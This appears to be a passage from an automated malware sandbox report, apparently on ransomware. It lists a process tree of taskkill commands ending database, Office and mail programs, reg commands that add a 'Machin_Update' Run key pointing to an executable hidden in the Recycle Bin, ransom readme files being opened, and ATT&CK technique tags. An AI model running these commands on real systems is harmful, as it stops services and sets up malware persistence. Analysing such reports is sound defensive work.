  Command line: taskkill /im sqlservr.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 820

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im sqlwriter.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 364

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im oracle.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1396

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im ocssd.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1364

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im dbsnmp.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 2020

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im synctime.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1244

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im agntsvc.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1552

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mydesktopqos.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 920

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im isqlplussvc.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 932

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im xfssvccon.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1272

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mydesktopservice.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 560

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im ocautoupds.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1984

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im agntsvc.exe
  - Kills process with taskkill
  PID: 268

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im encsvc.exe
  - Kills process with taskkill
  PID: 292

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im firefoxconfig.exe
  - Kills process with taskkill
  PID: 964

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im tbirdconfig.exe
  - Kills process with taskkill
  PID: 1044

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im ocomm.exe
  - Kills process with taskkill
  PID: 1776

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mysqld.exe
  - Kills process with taskkill
  PID: 1612

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mysqld-nt.exe
  - Kills process with taskkill
  PID: 1728

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mysqld-opt.exe
  - Kills process with taskkill
  PID: 1664

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im dbeng50.exe
  - Kills process with taskkill
  PID: 1060

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im sqbcoreservice.exe
  - Kills process with taskkill
  PID: 1300

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im excel.exe
  - Kills process with taskkill
  PID: 460

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im infopath.exe
  - Kills process with taskkill
  PID: 1924

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im msaccess.exe
  - Kills process with taskkill
  PID: 2028

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im mspub.exe
  - Kills process with taskkill
  PID: 624

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im onenote.exe
  - Kills process with taskkill
  PID: 1524

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im outlook.exe
  - Kills process with taskkill
  PID: 1520

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im powerpnt.exe
  - Kills process with taskkill
  PID: 864

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im steam.exe
  - Kills process with taskkill
  PID: 1732

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im thebat.exe
  - Kills process with taskkill
  PID: 1548

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im thebat64.exe
  - Kills process with taskkill
  PID: 1272

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im thunderbird.exe
  - Kills process with taskkill
  PID: 688

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im visio.exe
  - Kills process with taskkill
  PID: 580

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im winword.exe
  - Kills process with taskkill
  PID: 1780

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im wordpad.exe
  - Kills process with taskkill
  PID: 1260
Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
  PID: 1708

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
  PID: 1728

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
  - Modifies registry key
  PID: 672

Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  PID: 564

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  - Adds Run key to start application
  - Modifies registry key
  PID: 1732

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  - Adds Run key to start application
  PID: 1944
Level 1: C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 2008

Level 1: C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 796

Level 1: C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID: 1916

Level 1: C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
  PID: 1060

Level 1: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"
  PID: 1916
Network

MITRE ATT&CK Enterprise v6

Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)

Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- File Deletion (2)
- Modify Registry (3)